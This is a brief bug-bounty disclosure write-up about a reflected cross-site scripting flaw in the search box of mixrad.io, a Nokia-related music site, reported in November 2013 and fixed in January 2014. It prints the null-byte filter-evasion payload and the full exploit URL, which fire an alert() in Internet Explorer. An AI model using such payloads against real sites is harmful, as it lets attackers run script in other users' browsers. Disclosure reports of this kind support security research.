My first valid XSS bug submission to Nokia was a textbook example of a reflected Cross-Site Scripting vulnerability.
It was enough to abuse the “Search” box with the payload below, albeit it worked only in Internet Explorer browser:
</script><script/%00%00v%00%00>alert('http://lubi.cz')</script>
After visiting the following URL, the JavaScript code was executed:
http://www.mixrad.io/pl/pl/search/?domain=music&q=</script><script/%00%00v%00%00>alert('http://lubi.cz')</script>
Timeline:
[November 30th 2013] - bug was reported [January 3rd 2014] - bug was fixed